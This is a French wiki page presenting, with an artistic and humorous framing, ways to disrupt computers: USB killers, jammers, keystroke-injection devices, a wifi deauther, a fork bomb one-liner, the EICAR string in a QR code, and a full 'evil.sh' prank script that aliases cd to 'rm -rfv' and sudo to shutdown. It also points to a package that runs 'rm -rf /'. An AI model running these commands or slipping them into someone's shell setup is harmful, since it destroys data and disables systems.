Outils pour utilisateurs

Outils du site


computer-b-gone

Computer-b-gone

Computer-b-gone ?

Ou comment altérer le fonctionnement d'un ordinateur de façon malicieuse :)

Les ordinateurs étant susceptibles un jour ou l'autre d'échapper à notre contrôle, il peut être utile de connaître quelques façons de contrevenir à leur bon fonctionnement

Ce projet a des vocations avant tout artistiques et humoristiques, il convient de ne JAMAIS maltraiter un ordinateur qui ne vous appartient pas, et de CONSIDÉRER le coût environnemental de productions de ces appareils afin de tenter de les utiliser le plus longtemps possible

A retrouver, une présentation introductive à un atelier proposé à Nantes / Stéréolux duper-le-numerique-2019.odpduper-le-numerique-2019.pdf

Une autre avec quelques compléments pour une présentation à des étudiants en géographie à la Sorbonne detruire_ou_alterer_le_fonctionnement_des_machines_numeriques-2022.pdf

Un otro por el hackmeeting en Barcelona / Cataluna / Espana al fin de septiembre 2023 con traductiones y modifications destruir_o_alterar_el_funcionamiento_de_las_maquinas_digitales-2023b.pdf

Une présentation réalisée dans le cadre d'Internet Anonymat en 2024 à la Compagnie à Marseille à l'initative du collectif RYBN duper_le_numerique_2024.pdf

Mécanique

Bon, bien sur il est toujours possible de maltraiter physiquement un ordinateur …

Électrique

Court-circuit sur le 220v

peterlesplombs01.jpg

Court-circuit sur le port USB

Relier le + et le - sur un port USB femelle …

ASCII���User comments

Alimentation du port USB avec 200 v

x35f4eb29b9.jpg.pagespeed.ic.xafh6o4gsk.jpg fig:Usb-killer.jpg

Utilisation du 5v du port USB pour ...

Une très belle collection en 110v

The Etherkiller and Friends : Ne vous foutez pas de la gueule des gars du département informatique. Bien que leur bureau soit aussi désordonné que le mien, ils sont une force avec laquelle il ne faut pas se frotter. Au menu Etherkiller, Remote control, AUI Killer, BNC-Killer, VGA-Killer, Drive Killer, SCSI Killer, Ide Killer, Floppy Killer, RJ-11 Killer, DB25 Killer, V.35 Killer, Bus Killer, DB25 Killer

Électromagnétique

Jamming Bluetooth

Jamming Haute fréquence

Téléphone DECT et GSM, GPS, WiFi, bluetooth, …

Électronumérique

Simuler un clavier et une souris avec Teensy

teensy_2.jpg

USBdriveby installateur de porte dérobée

USBdriveby is a device you stylishly wear around your neck which can quickly and covertly install a backdoor and override DNS settings on an unlocked machine via USB in a matter of seconds. It does this by emulating a keyboard and mouse, blindly typing controlled commands, flailing the mouse pointer around and weaponizing mouse clicks.

FANGo Facebook Amazon Netflix Google Obfuscator

“FANGo” is a defense weapon against surveillance capitalism. Hidden under its appearance of mobile phone charger will be provided with a micro controller that takes control of the smartphone plugged in making queries to google, amazon and other search engines, launching videos in YouTube in order to deceive data brokers in their data capture process. http://martinnadal.eu/fango/

Numérique

Là aussi, il y a toute la cohorte des virus programmés à mauvais escient, on s'intéressera plutôt aux créations artistiques et astucieuses

Déconnexion wifi avec mini serveur

Voir le projet ESP8266 Deauther 2.0 https://github.com/spacehuhn/esp8266_deauther basée sur le mini serveur ESP8266 qui tient dans la poche. La liste des appareils compatibles On peut installer les programmes via l'IDE d'Arduino ou acheter une version pré-fabriquée avec de chouettes options comme l'écran LCD intégré, voir https://dstike.com et https://maltronics.com/ et d'autres “gadgets” chez https://shop.hak5.org/products/

Voir aussi ce projet artistique contre la surveillance urbaine (dans les magasins) en ville https://0xacab.org/kippleface/footfall-amulets

Voir la page wiki dédiée pour l'installation et l'utilisation

Spoofing de la géolocalisation via le wifi

Projet Skylift : SkyLift is a zero-click Wi-Fi geolocation spoofing device that virtually relocates visitors to Julian Assange’s residence at the Ecuadorian Embassy in London.

La fork bomb

La fork bomb est une attaque à l'encontre d'un système informatique qui consiste à multiplier les programmes informatiques exécutés simultanément sur celui-ci, selon le principe qu'un processus parent donne naissance à un processus enfant qui lui-même devient parent … jusqu'à l'agonie de l'ordinateur du fait de la surcharge

Une de mes préférées :

:(){ :|:& };:

La QR Code bomb

En intégrant la chaîne EICAR qui est utilisée pour tester les antivirus dans un QR code, une idée simple, mais efficace

Le hic, c’est que ces appareils ne filtrent pas toujours très bien l’information qu’ils reçoivent. Ainsi, à l’occasion de la conférence DEF CON 29, le hacker Richard Henderson a montré qu’il était possible de faire planter certains lecteurs en leur montrant un code QR qui encode la chaîne de caractères suivante :

  X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

L'usb killer logiciel

La psycho bomb

Comment rendre un utilisateur fou en altérant les fonctions de base de l'ordinateur : on répond “non” et l'ordinateur fait “oui” par exemple

#!/usr/bin/env bash
# evil.sh — https://mths.be/evil.sh
 
# Set `rm` as the default editor.
export EDITOR=/bin/rm;
 
# Make Tab send the delete key.
tset -Qe $'\t';
 
# Randomly make the shell exit whenever a command has a non-zero exit status.
((RANDOM % 10)) || set -o errexit;
 
# Let `cat` swallow every input and never return anything.
alias cat=true;
 
# Use a random sort option whenever `ls` is invoked.
function ls { command ls -$(opts="frStu"; echo ${opts:$((RANDOM % ${#opts})):1}) "$@"; }
 
# Delete directories instead of entering them.
alias cd='rm -rfv';
 
# Shut down the computer instead of running a command with super-user rights.
alias sudo='sudo shutdown -P now';

Suicide linux

  • Un paquet à installer sur votre Linux qui fait que si vous tapez une commande erronée, le disque dur de votre machine sera effacé avec un “rm -rf /” : https://qntm.org/suicide

Manuel appliqué pour maltraiter les ordinateurs

Boutiques de "gadgets" hack

Références

computer-b-gone.txt · Dernière modification : 2024/01/15 13:23 de Benjamin Labomedia